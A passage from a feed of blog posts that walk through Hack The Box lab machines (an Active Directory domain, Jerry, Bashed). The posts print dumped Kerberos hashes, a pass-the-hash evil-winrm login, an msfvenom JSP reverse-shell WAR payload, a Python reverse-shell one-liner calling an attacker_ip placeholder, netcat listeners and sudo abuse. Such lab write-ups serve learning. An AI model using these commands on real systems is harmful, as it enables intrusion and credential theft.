class="n">Primary:Kerberos-Newer-Keys</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Default</span><span class="w"> </span><span class="nx">Salt</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT.LOCALAdministrator</span><span class="w"> </span><span class="n">Default</span><span class="w"> </span><span class="nx">Iterations</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">4096</span><span class="w"> </span><span class="n">Credentials</span><span class="w"> </span><span class="nx">aes256_hmac</span><span class="w"> </span><span class="p">(</span><span class="mi">4096</span><span class="p">)</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">a76102a5617bffb1ea84ba0052767992823fd414697e81151f7de21bb41b1857</span><span class="w"> </span><span class="nx">aes128_hmac</span><span class="w"> </span><span class="p">(</span><span class="mi">4096</span><span class="p">)</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="mi">69</span><span class="n">e27df2550c5c270eca1d8ce5c46230</span><span class="w"> </span><span class="nx">des_cbc_md5</span><span class="w"> </span><span class="p">(</span><span class="mi">4096</span><span class="p">)</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">c2d9c892f2e6f2dc</span><span class="w"> </span><span class="nx">OldCredentials</span><span class="w"> </span><span class="n">aes256_hmac</span><span class="w"> </span><span class="p">(</span><span class="mi">4096</span><span class="p">)</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="mi">51</span><span class="n">d2b5ce03d6ea2e75e69050f32b927d0e602c2806dcb0d1dd0aacdda619a510</span><span class="w"> </span><span class="nx">aes128_hmac</span><span class="w"> </span><span class="p">(</span><span class="mi">4096</span><span class="p">)</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">b93da9262f5ce0ed724ce0177366bc8a</span><span class="w"> </span><span class="nx">des_cbc_md5</span><span class="w"> </span><span class="p">(</span><span class="mi">4096</span><span class="p">)</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="mi">0876</span><span class="n">d604a7087cf7</span><span class="w"> </span><span class="nx">OlderCredentials</span><span class="w"> </span><span class="n">aes256_hmac</span><span class="w"> </span><span class="p">(</span><span class="mi">4096</span><span class="p">)</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="mi">23</span><span class="n">cbc0dad348bebcbdbb4c82e9b23af299e8b56de358bafe24f2235f34497e4a</span><span class="w"> </span><span class="nx">aes128_hmac</span><span class="w"> </span><span class="p">(</span><span class="mi">4096</span><span class="p">)</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">e35eb565af30c8ed79df5d8875508df6</span><span class="w"> </span><span class="nx">des_cbc_md5</span><span class="w"> </span><span class="p">(</span><span class="mi">4096</span><span class="p">)</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="mi">4904021983252</span><span class="n">cd5</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Primary:Kerberos</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Default</span><span class="w"> </span><span class="nx">Salt</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT.LOCALAdministrator</span><span class="w"> </span><span class="n">Credentials</span><span class="w"> </span><span class="nx">des_cbc_md5</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">c2d9c892f2e6f2dc</span><span class="w"> </span><span class="n">OldCredentials</span><span class="w"> </span><span class="nx">des_cbc_md5</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">0876d604a7087cf7</span><span class="w"> </span></code></pre> </div> <p>Now we have Domain Admin hash, I tried cracking the hash but no luck so I decided to pass the hash using evil-winrm to log in to DC:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> ─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-hnkzcchgmi]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>proxychains evil-winrm <span class="nt">-i</span> 172.16.6.3 <span class="nt">-u</span> Administrator <span class="nt">-H</span> 27dedb1dab4d8545c6e1c66fba077da0 <span class="o">[</span>proxychains] config file found: /etc/proxychains.conf <span class="o">[</span>proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 <span class="o">[</span>proxychains] DLL init: proxychains-ng 4.16 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function </span>is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint <span class="o">[</span>proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; <span class="nb">whoami</span> <span class="o">[</span>proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK <span class="o">[</span>proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK inlanefreight<span class="se">\a</span>dministrator </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffg17l20tlki714n2lt4r.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffg17l20tlki714n2lt4r.png" alt="dc" width="800" height="211"></a></p> <p>Game Over.... Domain admin compromised!!!!!!</p> infosec microsoft security tutorial HTB (Jerry) — Walkthrough Michael Oladele Wed, 22 Apr 2026 18:00:19 +0000 https://forem.com/micheaol/htb-jerry-walkthrough-3l55 https://forem.com/micheaol/htb-jerry-walkthrough-3l55 <h2> Enumeration </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-p-</span> 10.129.136.9 Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2026-04-22 08:13 CDT Nmap scan report <span class="k">for </span>10.129.136.9 Host is up <span class="o">(</span>0.070s latency<span class="o">)</span><span class="nb">.</span> Not shown: 65534 filtered tcp ports <span class="o">(</span>no-response<span class="o">)</span> PORT STATE SERVICE 8080/tcp open http-proxy Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>108.21 seconds </code></pre> </div> <p>I got back only port <code>8080</code> let's dig in more into the port</p> <h2> Service Enumeration - port:8080 </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-A</span> <span class="nt">-p8080</span> 10.129.136.9 Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2026-04-22 08:16 CDT Nmap scan report <span class="k">for </span>10.129.136.9 Host is up <span class="o">(</span>0.071s latency<span class="o">)</span><span class="nb">.</span> PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88 |_http-favicon: Apache Tomcat |_http-open-proxy: Proxy might be redirecting requests Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device <span class="nb">type</span>: general purpose|phone|specialized Running <span class="o">(</span>JUST GUESSING<span class="o">)</span>: Microsoft Windows 2012|8|Phone|7 <span class="o">(</span>89%<span class="o">)</span> OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 Aggressive OS guesses: Microsoft Windows Server 2012 <span class="o">(</span>89%<span class="o">)</span>, Microsoft Windows Server 2012 or Windows Server 2012 R2 <span class="o">(</span>89%<span class="o">)</span>, Microsoft Windows Server 2012 R2 <span class="o">(</span>89%<span class="o">)</span>, Microsoft Windows 8.1 Update 1 <span class="o">(</span>86%<span class="o">)</span>, Microsoft Windows Phone 7.5 or 8.0 <span class="o">(</span>86%<span class="o">)</span>, Microsoft Windows Embedded Standard 7 <span class="o">(</span>85%<span class="o">)</span> No exact OS matches <span class="k">for </span>host <span class="o">(</span><span class="nb">test </span>conditions non-ideal<span class="o">)</span><span class="nb">.</span> Network Distance: 2 hops TRACEROUTE <span class="o">(</span>using port 8080/tcp<span class="o">)</span> HOP RTT ADDRESS 1 70.54 ms 10.10.14.1 2 70.77 ms 10.129.136.9 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span> Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>16.87 seconds </code></pre> </div> <p>We found that the service running is Tomcat. Let's chek for directories, but first, let's browse to the page.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4c6gk2m2mfd1vydlwpvm.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4c6gk2m2mfd1vydlwpvm.jpg" alt="tomcat" width="800" height="246"></a></p> <p>Now from the webpage, we can confirm the Tomcat version to be Tomcat/7.0.88.</p> <p>Now our gobuster scan is back:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://10.129.23.21:8080 <span class="nt">-w</span> /usr/share/wordlists/dirb/common.txt <span class="nt">-x</span> php,html,txt,sh,pl,cgi,aspx <span class="o">===============================================================</span> Gobuster v3.6 by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> <span class="o">===============================================================</span> <span class="o">[</span>+] Url: http://10.129.23.21:8080 <span class="o">[</span>+] Method: GET <span class="o">[</span>+] Threads: 10 <span class="o">[</span>+] Wordlist: /usr/share/wordlists/dirb/common.txt <span class="o">[</span>+] Negative Status codes: 404 <span class="o">[</span>+] User Agent: gobuster/3.6 <span class="o">[</span>+] Extensions: html,txt,sh,pl,cgi,aspx,php <span class="o">[</span>+] Timeout: 10s <span class="o">===============================================================</span> Starting gobuster <span class="k">in </span>directory enumeration mode <span class="o">===============================================================</span> /docs <span class="o">(</span>Status: 302<span class="o">)</span> <span class="o">[</span>Size: 0] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> /docs/] /examples <span class="o">(</span>Status: 302<span class="o">)</span> <span class="o">[</span>Size: 0] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> /examples/] /favicon.ico <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 21630] /host-manager <span class="o">(</span>Status: 302<span class="o">)</span> <span class="o">[</span>Size: 0] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> /host-manager/] /manager <span class="o">(</span>Status: 302<span class="o">)</span> <span class="o">[</span>Size: 0] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> /manager/] Progress: 36912 / 36920 <span class="o">(</span>99.98%<span class="o">)</span> <span class="o">===============================================================</span> Finished <span class="o">===============================================================</span> </code></pre> </div> <p>When we attemp to check the /manager and /host-manager we hit login wall.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fioby5dxxbw4z13odihxx.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fioby5dxxbw4z13odihxx.jpg" alt="tomcat" width="800" height="216"></a></p> <p>I checked online for default credentials, I found admin:admin. But when I tried admin:admin, I got an error page that changed everything.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F87dupijkcpwdmcetzscp.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F87dupijkcpwdmcetzscp.jpg" alt="tomcat" width="800" height="236"></a></p> <p>The error is a pointer: <code>For example, to add the manager-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed</code></p> <p>I decided to try <code>tomcat</code> as the username and <code>s3cret</code> as the password. Like a magic, it worked, we are in.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsw8gx1igsm34miw8qgrx.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsw8gx1igsm34miw8qgrx.jpg" alt="tomcat" width="800" height="237"></a></p> <p>When loged in, I discovered that I can upload a <code>WAR</code> file, my brain started thinking how to get reverse shell with the file upload.</p> <p>I created a <code>.war</code> payload with msfvenon:</p> <h2> Exploitation: </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>msfvenom <span class="nt">-p</span> java/jsp_shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>attacker_ip <span class="nv">LPORT</span><span class="o">=</span>attacker_port <span class="nt">-f</span> war <span class="nt">-o</span> shell.war </code></pre> </div> <p>The payload is ready, let's upload it. Before the file is uploaded, I started an ncat listerner on my local machine with the port indicated in the msfvenom payload.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nc <span class="nt">-lvnp</span> 4466 </code></pre> </div> <p>Now, ready? go! File uploaded:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6669bf6yne1jgbet1p6f.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6669bf6yne1jgbet1p6f.jpg" alt="tomcat" width="800" height="218"></a></p> <p>Successfully uploaded:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhodhsa83mikmvmxxnzkq.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhodhsa83mikmvmxxnzkq.jpg" alt="shell" width="800" height="228"></a></p> <p>With our ncat listener already listening, let's trigger the shell by clicking/navigating on/to it. We should pop a shell.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpuv9blwwxprgmj8bbr3r.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpuv9blwwxprgmj8bbr3r.jpg" alt="root" width="800" height="238"></a></p> <p>We pop a shell. and we are <code>authority\system</code> which means, No need for privilege escalation.</p> <h2> Lesson learned </h2> <ul> <li>Error messages should never leak sensitive data (credentials, paths, configs)</li> <li>Debugging information must be strictly separated from production environments</li> <li>What seems helpful for developers can be critical intel for attackers</li> <li>Secure defaults and proper error handling are part of your attack surface</li> </ul> <h2> Happy hacking!!!! </h2> security tutorial ai devops HTB (Bashed) — Walkthrough Michael Oladele Wed, 22 Apr 2026 12:31:29 +0000 https://forem.com/micheaol/htb-bashed-walkthrough-4j0c https://forem.com/micheaol/htb-bashed-walkthrough-4j0c <p>Bashed is one of the beginner-friendly machines on Hack The Box that focuses on web exploitation and privilege escalation using Linux misconfigurations. </p> <p>Let's start with the initial step, Enumeration:</p> <h2> Enumeration: </h2> <p>Our nmap scan returned:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-p-</span> 10.129.23.4 Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2026-04-22 05:29 CDT Nmap scan report <span class="k">for </span>10.129.23.4 Host is up <span class="o">(</span>0.073s latency<span class="o">)</span><span class="nb">.</span> Not shown: 65534 closed tcp ports <span class="o">(</span>reset<span class="o">)</span> PORT STATE SERVICE 80/tcp open http Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>49.80 seconds </code></pre> </div> <p>We got back a single openning port, port 80, let's dig in to the service: 80</p> <h2> Service Enumeration: </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-A</span> <span class="nt">-p80</span> 10.129.23.4 Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2026-04-22 05:34 CDT Nmap scan report <span class="k">for </span>10.129.23.4 Host is up <span class="o">(</span>0.071s latency<span class="o">)</span><span class="nb">.</span> PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span> |_http-title: Arrexel<span class="s1">'s Development Site |_http-server-header: Apache/2.4.18 (Ubuntu) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.12 (96%), Linux 3.13 (96%), Linux 3.2 - 4.9 (96%), Linux 3.8 - 3.11 (96%), Linux 4.8 (96%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 4.2 (95%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 70.62 ms 10.10.14.1 2 70.74 ms 10.129.23.4 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.21 seconds </span></code></pre> </div> <p>Our scan shows the following:</p> <ul> <li>Port 80 is running Apache 2.4.18 and It's Arrexel's Development Site</li> </ul> <p>Let's check what the page is like</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4w19rrta0a4obyelwzrd.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4w19rrta0a4obyelwzrd.jpg" alt="page" width="800" height="223"></a></p> <ul> <li>The line highlighted in the screenshot is worth paying attention to: "phpbash helps a lot with pentesting. I have tested it on multiple different servers and it was very useful. I actually developed it on this exact server!"</li> </ul> <p>Now let's check the directories, using gobuster:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://10.129.23.4/ <span class="nt">-w</span> /usr/share/wordlists/dirb/common.txt <span class="nt">-x</span> php,html,txt,sh,pl,cgi,aspx <span class="o">===============================================================</span> Gobuster v3.6 by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> <span class="o">===============================================================</span> <span class="o">[</span>+] Url: http://10.129.23.4/ <span class="o">[</span>+] Method: GET <span class="o">[</span>+] Threads: 10 <span class="o">[</span>+] Wordlist: /usr/share/wordlists/dirb/common.txt <span class="o">[</span>+] Negative Status codes: 404 <span class="o">[</span>+] User Agent: gobuster/3.6 <span class="o">[</span>+] Extensions: pl,cgi,aspx,php,html,txt,sh <span class="o">[</span>+] Timeout: 10s <span class="o">===============================================================</span> Starting gobuster <span class="k">in </span>directory enumeration mode <span class="o">===============================================================</span> /.php <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 290] /.html <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 291] /.hta.txt <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 294] /.hta <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 290] /.hta.pl <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 293] /.hta.cgi <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 294] /.hta.html <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 295] /.hta.php <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 294] /.hta.aspx <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 295] /.htaccess.sh <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 298] /.htaccess <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 295] /.hta.sh <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 293] /.htaccess.cgi <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 299] /.htaccess.pl <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 298] /.htpasswd.sh <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 298] /.htaccess.aspx <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 300] /.htaccess.txt <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 299] /.htaccess.html <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 300] /.htpasswd.txt <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 299] /.htpasswd.pl <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 298] /.htpasswd <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 295] /.htaccess.php <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 299] /.htpasswd.aspx <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 300] /.htpasswd.cgi <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 299] /.htpasswd.html <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 300] /.htpasswd.php <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 299] /about.html <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 8193] /config.php <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 0] /contact.html <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 7805] /css <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 308] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://10.129.23.4/css/] /dev <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 308] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://10.129.23.4/dev/] /fonts <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 310] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://10.129.23.4/fonts/] /images <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 311] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://10.129.23.4/images/] /index.html <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 7743] /index.html <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 7743] /js <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 307] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://10.129.23.4/js/] /php <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 308] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://10.129.23.4/php/] /server-status <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 299] /single.html <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 7477] /uploads <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 312] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://10.129.23.4/uploads/] Progress: 36912 / 36920 <span class="o">(</span>99.98%<span class="o">)</span> <span class="o">===============================================================</span> Finished <span class="o">===============================================================</span> </code></pre> </div> <p>The /dev looks juicy, When I chck it out I saw two file:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffv0rlkm1yqwxpx3s94zn.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffv0rlkm1yqwxpx3s94zn.jpg" alt="dev" width="800" height="203"></a></p> <p>It's like we got bash in the browser, let's check each of the files:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fttilhil3x3ow46h026a6.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fttilhil3x3ow46h026a6.jpg" alt="shell" width="800" height="232"></a></p> <p>We can se got phpbash in the browser and we successfully run a command. Now let's see if we can get a reverse shell via this bash.</p> <h2> Exploitation </h2> <p>I got the shell code below redy to run on the php bash:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python <span class="nt">-c</span> <span class="s1">'import socket,subprocess,os;s=socket.socket();s.connect(("attacker_ip",attacker_port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'</span> </code></pre> </div> <p>Before running the code in the phpbash, start my ncat listener:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nc <span class="nt">-lvnp</span> 4466 </code></pre> </div> <p>Then run the code in the php bash to pop a shell. We pop a shell, now we own the machine.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn7eflozmnieiygx68l2c.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn7eflozmnieiygx68l2c.jpg" alt="Shell" width="800" height="173"></a></p> <p>But if you noticed, we have low privilege because we are currently www-data, so we need to elevate our privilege.</p> <h2> Privilege Escalation: </h2> <p>So by default, the first thing I do is to run <code>sudo -l</code> to check the commands I can run with sudo without password. So let's run <code>sudo -l</code><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>www-data@bashed:/var/www/html/dev<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span> <span class="nb">sudo</span> <span class="nt">-l</span> Matching Defaults entries <span class="k">for </span>www-data on bashed: env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin User www-data may run the following commands on bashed: <span class="o">(</span>scriptmanager : scriptmanager<span class="o">)</span> NOPASSWD: ALL www-data@bashed:/var/www/html/dev<span class="nv">$ </span> </code></pre> </div> <p>This: <code>(scriptmanager : scriptmanager) NOPASSWD: ALL</code> is very important</p> <p>This means as the user <code>scriptmanager</code> we can switch to scriptmanager with sudo without password, let's try that out.</p> <p>The command above allows us to Log me into a new shell session as the user 'scriptmanager' with their full environment loaded:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> <span class="nt">-u</span> scriptmanager <span class="nt">-i</span> </code></pre> </div> <p><a 